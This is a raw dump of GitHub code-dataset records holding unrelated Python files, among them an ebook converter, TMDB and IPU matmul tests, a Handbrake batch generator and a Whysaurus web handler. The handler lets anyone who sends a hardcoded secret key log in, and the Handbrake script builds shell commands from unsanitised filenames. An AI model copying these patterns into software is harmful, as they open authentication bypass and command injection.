get_round_keys_verbose(k6)\n\n\n","repo_name":"DarkPhoenix6/My_Libraries","sub_path":"Python/AES/gen_key_schedule.py","file_name":"gen_key_schedule.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33590461380","text":"from os import listdir, rename\nfrom os.path import isfile, join\nimport subprocess\nfrom tqdm import tqdm\n\n\ndef converter() -> str:\n\n ignored_extensions = ['pdf', 'txt']\n downloaded_epub = \"/Users/jennifersequina/Downloads/\"\n mobi_kindle = downloaded_epub + \"mobi_kindle/\"\n processed_epub = downloaded_epub + \"processed_epub/\"\n\n raw_files = [f for f in listdir(downloaded_epub) if isfile(join(downloaded_epub, f))]\n converted_files = [f for f in listdir(mobi_kindle) if isfile(join(mobi_kindle, f))]\n\n def get_file_extension(f):\n return f.split(\".\")[-1]\n\n def get_final_filename(f):\n f = f.split(\".\")\n filename = \".\".join(f[0:-1])\n processed_file_name = filename + \".mobi\"\n return processed_file_name\n\n for f in tqdm(raw_files):\n final_file_name = get_final_filename(f)\n extension = get_file_extension(f)\n if final_file_name not in converted_files and extension not in ignored_extensions:\n print(\"Converting : \"+f)\n try:\n subprocess.call(['/Applications/calibre.app/Contents/MacOS/ebook-convert', downloaded_epub+f, mobi_kindle+final_file_name])\n rename(downloaded_epub+f, processed_epub+f)\n except Exception as e:\n print(e)\n else:\n print(\"Already exists : \"+final_file_name)\n\n print(\"Kindle Path: \" + str(mobi_kindle+final_file_name))\n return str(mobi_kindle+final_file_name)\n\n","repo_name":"jennifersequina/bookie","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27175744807","text":"from compare_am import get_random_pcp, get_best_response\nfrom general_easyness import lprint, remove_special\n\n\n\ndef get_baseline(n):\n \"\"\" Establishes a baseline through comparing with the most upvoted answer to a\n\n post. results can be seen in reddit_qa.csv\n \"\"\"\n questions = []\n answers = []\n qap = [\"Questions,Top Answers,Chosen Answer Additive, Chosen Answer multiplicative, control score additive, control score multiplicative,reitze score additive,reitze score multiplicative,jochem score additive, jochem score multiplicative\"]\n i = 0\n for pcp in get_random_pcp(n):\n question = remove_special(pcp[0][1])\n answers = pcp[1]\n if answers == []:\n best_answer = \"\"\n else:\n best_answer = remove_special(answers[0][1])\n questions.append(question)\n answers.append(best_answer)\n a_add = get_best_response(question, \"additive\", nposts=1)\n a_mul = get_best_response(question, \"multiplicative\", nposts=1)\n combined = [question, best_answer, a_add, a_mul, str(int(best_answer==a_add)), str(int(best_answer==a_mul)),\"\",\"\",\"\",\"\"]\n qap.append(\",\".join(combined))\n reddit_qa = \"allreddit_qa.csv\"\n f = open(reddit_qa, \"w+\")\n for pair in qap:\n f.write(pair+\"\\n\")\n f.close()\n\n\ndef get_answers_queryfile(filename):\n \"\"\" generates answers to questions from an input file\n\n output for us to judge is in our_qa.csv\n \"\"\"\n f = open(filename, \"r\")\n w = open(\"allour_qa.csv\", \"w+\")\n w.write(\"Questions,Chosen Answer Additive, Chosen Answer multiplicative, reitze score additive,reitze score multiplicative,jochem score additive, jochem score multiplicative\\n\")\n for line in f.readlines():\n if line[-1] == \"\\n\":\n line = line[:-1]\n question = remove_special(line)\n a_add = get_best_response(question, \"additive\", nposts=10)\n a_mul = get_best_response(question, \"multiplicative\", nposts=10)\n combined = [question, a_add, a_mul, \"\",\"\",\"\",\"\"]\n w.write(\",\".join(combined)+\"\\n\")\n f.close()\n w.close()\n\nfilename = \"our_questions.txt\"\n#get_answers_queryfile(filename)\nget_baseline(100)\n","repo_name":"rlhjansen/LSDP_RedditHelper","sub_path":"test_questions.py","file_name":"test_questions.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70846271789","text":"from unittest.mock import Mock\nimport tmdb_client\nimport json\n\n\ndef test_get_poster_url_uses_default_size():\n # Przygotowanie danych\n poster_api_path = \"some-poster-path\"\n expected_default_size = 'w342'\n # Wywołanie kodu, który testujemy\n poster_url = tmdb_client.get_poster_url(poster_api_path=poster_api_path)\n # Porównanie wyników\n assert expected_default_size in poster_url\n\ndef test_get_movies_list_type_popular():\n movies_list = tmdb_client.get_movies_list(list_name=\"popular\")\n assert movies_list is not None \n\ndef some_function_to_mock():\n raise Exception(\"Original was called\") \n\ndef test_mocking(monkeypatch):\n my_mock = Mock()\n my_mock.return_value = 2\n monkeypatch.setattr(\"tests.test_tmdb.some_function_to_mock\", my_mock)\n result = some_function_to_mock()\n assert result == 2\n\ndef test_get_movies_list(monkeypatch):\n # Lista, którą będzie zwracać przysłonięte \"zapytanie do API\"\n mock_movies_list = ['Movie 1', 'Movie 2']\n\n requests_mock = Mock()\n # Wynik wywołania zapytania do API\n response = requests_mock.return_value\n # Przysłaniamy wynik wywołania metody .json()\n response.json.return_value = mock_movies_list\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n movies_list = tmdb_client.get_movies_list(list_name=\"popular\")\n assert movies_list == mock_movies_list \n\ndef test_get_single_movie(monkeypatch):\n mock_single_movie = 'Monkey'\n requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_single_movie\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n single_movie = tmdb_client.get_single_movie(movie_id='Monkey')\n assert single_movie == mock_single_movie \n\ndef test_get_single_movie_cast(monkeypatch):\n mock_single_movie_cast = ['Monkey 1', 'Monkey2']\n requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_single_movie_cast\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n \n single_movie_cast = tmdb_client.get_single_movie(movie_id='Monkey')\n assert single_movie_cast == mock_single_movie_cast \n \ndef test_get_movie_images(monkeypatch):\n mock_movie_images = 'Image.jpg'\n requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_movie_images\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n movie_images = tmdb_client.get_movie_images(movie_id='Monkey')\n assert movie_images == mock_movie_images\n\nfrom main import app\nimport pytest\n\n@pytest.mark.parametrize(\"list_type\", [\"now_playing\", \"upcoming\", \"popular\", \"top_rated\"])\ndef test_homepage(monkeypatch, list_type):\n api_mock = Mock(return_value={'results': []})\n monkeypatch.setattr(\"tmdb_client.call_tmdb_api\", api_mock)\n\n with app.test_client() as client:\n response = client.get(f\"/?list_name={list_type}\")\n assert response.status_code == 200\n api_mock.assert_called_once_with(f\"movie/{list_type}\")\n","repo_name":"KarZyl/movies_catalogue","sub_path":"tests/test_tmdb.py","file_name":"test_tmdb.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5543507151","text":"from BitSightAPI.client import Session\n\n\nclass Portfolio(Session):\n \"\"\"\n Portfolio class\n \"\"\"\n\n def __init__(self, session, company_guid='', user_guid=''):\n self.api_key = session.api_key\n self.api_endpoint = '/v1/portfolio'\n self.api_variables = {\n 'company_guid': company_guid,\n 'user_guid': user_guid\n }\n self.api_paths = {\n 'root': '/',\n 'breaches': '/breaches',\n 'contacts': '/contacts',\n 'edit contacts': '/contacts/%(user_guid)s',\n 'custom ids': '/entity-custom-ids',\n 'filters': '/filters',\n 'guids': '/guids',\n 'products': '/products',\n 'providers': '/providers',\n 'provider dependents': '/providers/%(company_guid)s/companies',\n 'provider products': '/providers/%(company_guid)s/products',\n 'ratings': '/ratings',\n 'statistics': '/statistics'\n }\n self.api_params = [\n 'company_guid',\n 'custom_id',\n 'email',\n 'end',\n 'exclude_alerts_only',\n 'fields',\n 'folder',\n 'formal_name',\n 'format',\n 'friendly_name',\n 'guid',\n 'name',\n 'phone_number',\n 'quarters_back',\n 'rating_date',\n 'show_ips',\n 'show_event_evidence',\n 'start',\n 'tier',\n 'types'\n ]","repo_name":"InfosecSapper/BitSightAPI","sub_path":"BitSightAPI/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"40910726096","text":"import json\nimport logging\nfrom authhandler import AuthHandler\nfrom models.point import Point\nfrom models.source import Source\nfrom models.reportEvent import ReportEvent\n\nfrom google.appengine.ext import ndb\n\nclass NewPoint(AuthHandler):\n @ndb.toplevel\n def newPoint(self): \n user = self.current_user\n resultJSON = json.dumps({'result': False, 'error': 'Not authorized'})\n secretKey = self.request.get('secret')\n \n if not user: \n if (secretKey == 'myballotsecret'):\n self.loginBySecretKey(secretKey)\n user = self.current_user\n if user:\n self.response.headers['Access-Control-Allow-Origin'] = '*'\n\n if user: \n if not self.request.get('title'): \n resultJSON = json.dumps({'result': False, 'error': 'Your point must have a title'})\n else:\n sourcesURLs=json.loads(self.request.get('sourcesURLs')) if self.request.get('sourcesURLs') else None\n sourcesNames=json.loads(self.request.get('sourcesNames')) if self.request.get('sourcesNames') else None\n newPoint, newPointRoot = Point.create(\n title=self.request.get('title'),\n content=self.request.get('content'),\n summaryText=self.request.get('plainText'),\n user=user,\n imageURL=self.request.get('imageURL'),\n imageAuthor=self.request.get('imageAuthor'),\n imageDescription=self.request.get('imageDescription'),\n sourceURLs=sourcesURLs,\n sourceNames=sourcesNames)\n \n if newPoint: \n recentlyViewed, sources = yield user.getRecentlyViewed_async( \\\n excludeList=[newPoint.key.parent()] + \\\n newPoint.getLinkedPointsRootKeys(\"supporting\") + \\\n newPoint.getLinkedPointsRootKeys(\"counter\")), \\\n newPoint.getSources_async()\n \n templateValues = {\n 'point': newPoint,\n 'pointRoot': newPointRoot,\n 'recentlyViewedPoints': recentlyViewed,\n 'supportingPoints': None,\n 'counterPoints': None,\n 'supportedPoints':newPointRoot.getBacklinkPoints(\"supporting\"),\n 'counteredPoints':newPointRoot.getBacklinkPoints(\"counter\"),\n 'sources': sources,\n 'user': user,\n 'voteValue': 0,\n 'ribbonValue': False,\n 'currentArea':self.session.get('currentArea'),\n 'currentAreaDisplayName':self.session.get('currentAreaDisplayName')\n }\n html = self.template_render('pointContent.html', templateValues)\n\n templateValues = {\n 'user': self.current_user, \n 'pointRoot': newPointRoot,\n 'comments': None\n } \n commentHTML = self.template_render('pointComments.html', templateValues)\n resultJSON = json.dumps({'result': True, \n 'pointURL': newPoint.url,\n 'title':newPoint.title,\n 'html': html,\n 'commentHTML': commentHTML,\n 'rootKey': newPointRoot.key.urlsafe()\n })\n ReportEvent.queueEventRecord(user.key.urlsafe(), newPoint.key.urlsafe(), None, \"Create Point\") \n else:\n resultJSON = json.dumps({'result': False, 'error': 'Failed to create point.'})\n else:\n resultJSON = json.dumps({'result': False, 'error': 'You appear not to be logged in.'})\n\n self.response.headers[\"Pragma\"]=\"no-cache\"\n self.response.headers[\"Cache-Control\"]=\"no-cache, no-store, must-revalidate, pre-check=0, post-check=0\"\n self.response.headers[\"Expires\"]=\"Thu, 01 Dec 1994 16:00:00\" \n self.response.headers[\"Content-Type\"] = 'application/json; charset=utf-8'\n self.response.out.write(resultJSON)\n\n","repo_name":"aaronlifshin/whysaurus","sub_path":"handlers/newpoint.py","file_name":"newpoint.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"37355955660","text":"import functools\nimport numpy as np\nfrom absl.testing import parameterized\n\nfrom tensorflow.python import ipu\nfrom tensorflow.python.client import session as sl\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gradients_impl\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.python.platform import googletest\n\nTEST_CASES = ({\n 'testcase_name': 'a_columns',\n 'a_shape': [8, 16],\n 'b_shape': [16, 5],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_tb',\n 'a_shape': [32, 8],\n 'b_shape': [1, 8],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_ta_tb',\n 'a_shape': [64, 32],\n 'b_shape': [128, 64],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 8,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns',\n 'a_shape': [4, 21],\n 'b_shape': [21, 8],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 3,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_tb',\n 'a_shape': [4, 72],\n 'b_shape': [1, 72],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_ta_tb',\n 'a_shape': [4, 5],\n 'b_shape': [5, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 4,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'b_rows',\n 'a_shape': [4, 4],\n 'b_shape': [4, 8],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_tb',\n 'a_shape': [4, 4],\n 'b_shape': [44, 4],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_ta_tb',\n 'a_shape': [4, 5],\n 'b_shape': [8, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 4,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'a_columns_serial_factor_1',\n 'a_shape': [4, 5],\n 'b_shape': [5, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 1,\n 'serialization_dimension': 'a_columns',\n})\n\n\ndef _getTestCases():\n from copy import deepcopy\n\n test_cases = list(TEST_CASES)\n # Add test cases with a batch dim for a.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_a\"\n case['a_shape'] = [2] + case['a_shape']\n test_cases.append(case)\n # Add test cases with a batch dim for b.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_b\"\n case['b_shape'] = [3] + case['b_shape']\n test_cases.append(case)\n # Add test cases with a batch dim for a and b.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_a_batch_b\"\n case['a_shape'] = [3] + case['a_shape']\n case['b_shape'] = [3] + case['b_shape']\n test_cases.append(case)\n return test_cases\n\n\n# Note that in this test we expect small numerical differences as serializing\n# means that some operations are done in a different order.\nclass SerializedMatmulTest(test_util.TensorFlowTestCase,\n parameterized.TestCase):\n def setUp(self):\n super().setUp()\n np.random.seed(0xDEADBEEF)\n\n def _testOnCpu(self, model_fn, placeholders, inputs, sess, scope_name=None):\n scope_name = scope_name if scope_name else \"cpu_vs\"\n with variable_scope.variable_scope(scope_name, use_resource=True):\n output = model_fn(*placeholders)\n sess.run(variables.global_variables_initializer())\n return sess.run(output, inputs)\n\n def _testOnIpu(self, model_fn, placeholders, inputs, sess, scope_name=None):\n with ipu.scopes.ipu_scope('/device:IPU:0'):\n scope_name = scope_name if scope_name else \"ipu_vs\"\n with variable_scope.variable_scope(scope_name, use_resource=True):\n output = ipu.ipu_compiler.compile(model_fn, placeholders)\n ipu.utils.move_variable_initialization_to_cpu()\n sess.run(variables.global_variables_initializer())\n return sess.run(output, inputs)\n\n @parameterized.named_parameters(*_getTestCases())\n @test_util.deprecated_graph_mode_only\n def testSerializedMatmul(self, a_shape, b_shape, transpose_a, transpose_b,\n serialization_factor, serialization_dimension):\n a = array_ops.placeholder(np.float32, a_shape)\n b = array_ops.placeholder(np.float32, b_shape)\n\n def cpu_matmul(a, b):\n return math_ops.matmul(a,\n b,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def ipu_matmul(a, b):\n return ipu.math_ops.serialized_matmul(a,\n b,\n serialization_factor,\n serialization_dimension,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n a_val = np.random.normal(2.0, 2.0, a_shape)\n b_val = np.random.normal(2.0, 2.0, b_shape)\n\n with sl.Session() as sess:\n cpu_output = self._testOnCpu(cpu_matmul, [a, b], {\n a: a_val,\n b: b_val\n }, sess)\n ipu_output = self._testOnIpu(ipu_matmul, [a, b], {\n a: a_val,\n b: b_val\n }, sess)\n self.assertAllClose(cpu_output, ipu_output[0], atol=1.e-05, rtol=1.e-05)\n\n @parameterized.named_parameters(*_getTestCases())\n @test_util.deprecated_graph_mode_only\n def testSerializedMatmulGrad(self, a_shape, b_shape, transpose_a,\n transpose_b, serialization_factor,\n serialization_dimension):\n a_val = array_ops.constant(np.random.normal(2.0, 2.0, a_shape),\n dtype=np.float32)\n b_val = array_ops.constant(np.random.normal(2.0, 2.0, b_shape),\n dtype=np.float32)\n\n def matmul(a, b):\n return math_ops.matmul(a,\n b,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def serialized_matmul(a, b):\n return ipu.math_ops.serialized_matmul(a,\n b,\n serialization_factor,\n serialization_dimension,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def model_fn(matmul_fn):\n a = variable_scope.get_variable(\"a\", initializer=a_val)\n b = variable_scope.get_variable(\"b\", initializer=b_val)\n c = matmul_fn(a, b)\n # Not a real loss function, but good enough for testing backprop.\n loss = math_ops.reduce_sum(c)\n outputs = gradients_impl.gradients(loss, [a, b])\n outputs.append(loss)\n return outputs\n\n ipu_fn = functools.partial(model_fn, matmul)\n ipu_serial_fn = functools.partial(model_fn, serialized_matmul)\n\n with sl.Session() as sess:\n a, b, l = self._testOnIpu(ipu_fn, [], {}, sess, \"normal\")\n serial_a, serial_b, serial_l = self._testOnIpu(ipu_serial_fn, [], {},\n sess, \"serial\")\n\n self.assertAllClose(a, serial_a, atol=1.e-05, rtol=1.e-05)\n self.assertAllClose(b, serial_b, atol=1.e-05, rtol=1.e-05)\n self.assertAllClose([l], [serial_l], atol=1.e-05, rtol=1.e-05)\n\n\nif __name__ == \"__main__\":\n googletest.main()\n","repo_name":"hephaex/tensorflow-1","sub_path":"tensorflow/python/ipu/tests/math_ops_test.py","file_name":"math_ops_test.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"74523833386","text":"import subprocess, sys, os, re, shlex, json, csv, os.path, time\r\nprint ('Handbrake batch file creator V2 - T.Barnard 2020')\r\n\r\ndef Handbrake_batch_maker_list (input_file_list, input_path, output_path, script_name,x265, run_compress):\r\n \r\n #store value of x265 so it can be set back if adjusted\r\n stored_x265 = x265\r\n # Check if output path exists\r\n if os.path.isdir(str(output_path)):\r\n print ('Output Directory = ', str(output_path))\r\n else:\r\n print ('Error - Output path does not exist')\r\n quit()\r\n \r\n # open files \r\n batchfile = open(script_name, \"w\") # Output Batch file\r\n batchfile.write('powercfg /s 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c\\n')\r\n if run_compress == True:\r\n subprocess.call('powercfg /s 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c')\r\n # Create List of files from input directory\r\n for dirname, subFolders, files in os.walk(input_path):\r\n # check if sub directories exist on output path, Add command to create directory if subfolders do not exist\r\n for subFoldersname in subFolders:\r\n Full_path = os.path.join(output_path, subFoldersname)\r\n if os.path.isdir(Full_path):\r\n print ('Output sub directory ' + Full_path + ' exists')\r\n else:\r\n outputsubdir = str(os.path.join(str(output_path),dirname, subFoldersname))\r\n outputsubdir = outputsubdir.replace(str(input_path), str(output_path))\r\n batchfile.write('mkdir \"' + outputsubdir + '\"\\n')\r\n if run_compress == True:\r\n os.mkdir(outputsubdir)\r\n \t \t\t\r\n print (input_file_list)\r\n \r\n # Specify outout path\r\n path_out = str(output_path)\r\n \r\n # Perform FFprobe on each .mkv file in every sub-directory\r\n for files in input_file_list:\r\n if \".mkv\" in files:\r\n \r\n #Detemine full path of file\r\n #full_file_path = str(input_path) + '\\\\' + files\r\n full_file_path = files\r\n \t\r\n # Invoke FFProbe, capture output and any errors\r\n p = subprocess.Popen(['ffprobe', '-print_format', 'json', '-show_format', '-show_streams', full_file_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )\r\n out, err = p.communicate()\r\n \r\n # create empty list for audio tracks\r\n AudioTrackList = []\r\n \r\n # create empty list for subtitles tracks\r\n SubTrackList = []\r\n \t\r\n #Import JSON string\r\n FfprobeJsonParsed = json.loads(out.decode('utf-8'))\r\n \r\n subtitle_count = 1\r\n # Convert to .csv\r\n print(FfprobeJsonParsed['format']['filename'])\r\n filename = (FfprobeJsonParsed['format']['filename'])\r\n VideoData = FfprobeJsonParsed['streams']\r\n print(len(VideoData), ' streams detected')\r\n forced_subtitles = False\r\n for stream in range(0, (len(VideoData))):\r\n if VideoData[stream]['codec_type'] == 'video':\r\n print( VideoData[stream]['index'], VideoData[stream]['codec_type'], VideoData[stream]['codec_name'], VideoData[stream]['height'], VideoData[stream]['width'], VideoData[stream]['display_aspect_ratio'], VideoData[stream]['sample_aspect_ratio'])\r\n videotrack = stream\r\n if VideoData[stream]['height'] == 1080:\r\n quality = 24\r\n else:\r\n quality = 20\r\n x265 = False\r\n if (VideoData[stream]['codec_type'] == 'audio' and VideoData[stream]['tags']['language'] == 'eng'):\r\n print(VideoData[stream]['index'], VideoData[stream]['codec_type'], VideoData[stream]['codec_name'], VideoData[stream]['channels'],VideoData[stream]['tags']['language'] )\r\n # add to list of audio tracks\r\n AudioTrackList.append(stream)\r\n \r\n if (VideoData[stream]['codec_type'] == 'subtitle' and VideoData[stream]['tags']['language'] == 'eng'):\r\n print(VideoData[stream]['index'], VideoData[stream]['codec_type'], VideoData[stream]['disposition']['forced'],VideoData[stream]['tags']['language'] )\r\n forced_subtitle_track = 0\r\n forced_subtitles = False\r\n # Set flag for forced sub-titles\r\n if VideoData[stream]['disposition']['forced'] == 1:\r\n forced_subtitles = True\r\n forced_subtitle_track = str(subtitle_count)\r\n # add to list of subtitle tracks\r\n SubTrackList.append(subtitle_count)\r\n if (VideoData[stream]['codec_type'] == 'subtitle'):\r\n subtitle_count = subtitle_count + 1\r\n # Print tracks to be processed\r\n print('Video Track = ', videotrack)\t\r\n print('English Audio Tracks = ', AudioTrackList)\r\n \t\r\n \t# convert subtitle List to string\r\n SubTrackString = ''\r\n \t\r\n for p in range(0, len(SubTrackList)): SubTrackString = SubTrackString + str(SubTrackList[p]) + ','\r\n print(SubTrackString)\r\n print('English Subtitle Tracks = ', SubTrackList ) \r\n \r\n # Create subtitle string\r\n if len(SubTrackList) == 0:\r\n subtitle_command = ''\r\n else:\r\n subtitle_command = '--subtitle ' + SubTrackString\r\n # Add quotes around filename\r\n filename = '\"' + str(filename) + '\"'\r\n \t\r\n # Set output filename, replace base input path with base output path\r\n filenameout = filename.replace(str(input_path), str(output_path))\r\n \r\n \t# Generate Handbrake command line\r\n # Encoder settings\r\n if (quality == 20 or x265 == False):\r\n encoder_setting = '--encoder nvenc_h264 --encoder-preset slow '\r\n else:\r\n encoder_setting = '--encoder nvenc_h265 --encoder-preset medium '\r\n # Forced Subtitles\r\n if forced_subtitles == True:\r\n subtitle_command = subtitle_command + '--subtitle-forced '+ forced_subtitle_track\r\n\r\n handbrake_command_line = 'handbrakecli --input ' + str(filename) + ' --output ' + str(filenameout) + ' --format mkv --markers ' + encoder_setting + '--quality ' + str(quality) + ' --audio-lang-list eng --all-audio --aencoder copy ' + subtitle_command +'\\n'\r\n print(handbrake_command_line)\r\n batchfile.write(handbrake_command_line)\r\n if run_compress == True:\r\n print('compressing!')\r\n subprocess.call(handbrake_command_line)\r\n\r\n x265 = stored_x265\r\n \r\n batchfile.write('powercfg /s 381b4222-f694-41f0-9685-ff5bb260df2e\\n') \r\n batchfile.close()\r\n if run_compress == True:\r\n subprocess.call('powercfg /s 381b4222-f694-41f0-9685-ff5bb260df2e')\r\n time.sleep(10)\r\n return\r\n","repo_name":"tonyramponi/HandbrakeScanAndBatch","sub_path":"Handbrake_batch_maker_list.py","file_name":"Handbrake_batch_maker_list.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4248118821","text":"#!/usr/bin/env python3\n\nfrom lib.automation import *\n\nclass InstallerTemplate:\n\n def check(self, config):\n return True if command_exists(\"git\") else \"'git' package not installed\"\n\n def install(self, config):\n proj = \"oblique/create_ap\"\n print_status(\"Cloning {0}...\".format(proj), 1)\n github_clone(proj, \"/opt/\")\n folder_name = \"/opt/{0}-git\".format(proj.replace('/','_').lower())\n run_command(\"cd {0}; make install\".format(folder_name))\n run_command(\"rm -rf {0}\".format(folder_name))\n print_success(\"Done!\", 1)\n","repo_name":"thomascannon/kali-setup","sub_path":"modules/create_ap.py","file_name":"create_ap.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42775229497","text":"import numpy as np\n\nfrom .base_plots import TimePlot\n\n\nclass RewardPlot(TimePlot):\n \"\"\"Plot to display the instantaneous reward during the episode\"\"\"\n\n def __init__(self):\n super().__init__()\n self._reward_range = None\n self._reward_line = None\n self._reward_data = None\n self._reward_line_cfg = self._default_time_line_cfg.copy()\n self._reward_line_cfg['color'] = self._colors[-1]\n\n def initialize(self, axis):\n super().initialize(axis)\n self._reward_line, = self._axis.plot(self._x_data, self._reward_data, **self._reward_line_cfg)\n self._lines.append(self._reward_line)\n\n def set_env(self, env):\n super().set_env(env)\n self._reward_range = env.reward_range\n self._reward_data = np.full(shape=self._x_data.shape, fill_value=np.nan)\n self._y_data = [self._reward_data]\n min_limit = self._reward_range[0]\n max_limit = self._reward_range[1]\n spacing = 0.1 * (max_limit - min_limit)\n self._y_lim = (min_limit - spacing, max_limit + spacing)\n self._label = 'reward'\n\n def reset_data(self):\n super().reset_data()\n self._reward_data = np.full(shape=self._x_data.shape, fill_value=np.nan)\n\n def on_step_end(self, k, state, reference, reward, terminated):\n idx = self.data_idx\n self._x_data[idx] = self._t\n self._reward_data[idx] = reward\n super().on_step_end(k, state, reference, reward, terminated)\n","repo_name":"upb-lea/gym-electric-motor","sub_path":"gym_electric_motor/visualization/motor_dashboard_plots/reward_plot.py","file_name":"reward_plot.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"37"} +{"seq_id":"36207164098","text":"#!/usr/bin/python \n# -*- coding=utf8 -*-\n# Created by carrot on 2017/8/23.\n\n\"\"\"\n题目:利用条件运算符的嵌套来完成此题:学习成绩>=90分的同学用A表示,60-89分之间的用B表示,60分以下的用C表示。\n程序分析:程序分析:(a>b)?a:b这是条件运算符的基本例子。\n\"\"\"\n\ndef main():\n score = float(input(\"输入分数:\"))\n if score >= 90:\n grade = \"A\"\n elif score >= 60:\n grade = \"B\"\n else:\n grade = \"C\"\n print(\"分数:%.1f 级别:%s\" % (score, grade))\n\n\nif __name__ == '__main__':\n main()","repo_name":"116pythonZS/YiBaiExample","sub_path":"015.py","file_name":"015.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22440957358","text":"\"\"\"\nThis script is used to extract data from S3, process that data using Spark, and\nload the data back into S3. This will be done in two steps:\n\n 1. Load song_data and log_data from S3\n 2. Process the data into analytics tables using Spark\n 3. Load them back into S3\n\"\"\"\n\nimport configparser\nimport os\nfrom datetime import datetime\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (\n monotonically_increasing_id,\n col,\n date_format,\n dayofmonth,\n hour,\n month,\n udf,\n weekofyear,\n year,\n)\n\nconfig = configparser.ConfigParser()\nconfig.read(\"dl.cfg\")\n\nos.environ[\"AWS_ACCESS_KEY_ID\"] = (\n config.get(\"AWS\", \"AWS_ACCESS_KEY_ID\")\n)\nos.environ[\"AWS_SECRET_ACCESS_KEY\"] = (\n config.get(\"AWS\", \"AWS_SECRET_ACCESS_KEY\")\n)\n\n\ndef create_spark_session() -> SparkSession:\n \"\"\"\n Create a Spark session\n\n Parameters:\n None\n\n Returns:\n SparkSession: Spark session\n \"\"\"\n\n spark = SparkSession.builder.config(\n \"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:3.3.1\"\n ).getOrCreate()\n\n return spark\n\n\ndef process_song_data(\n spark: SparkSession,\n input_data: str,\n output_data: str\n) -> None:\n \"\"\"\n Process song data\n\n Parameters:\n spark (SparkSession): Spark session\n input_data (str): Input data path\n output_data 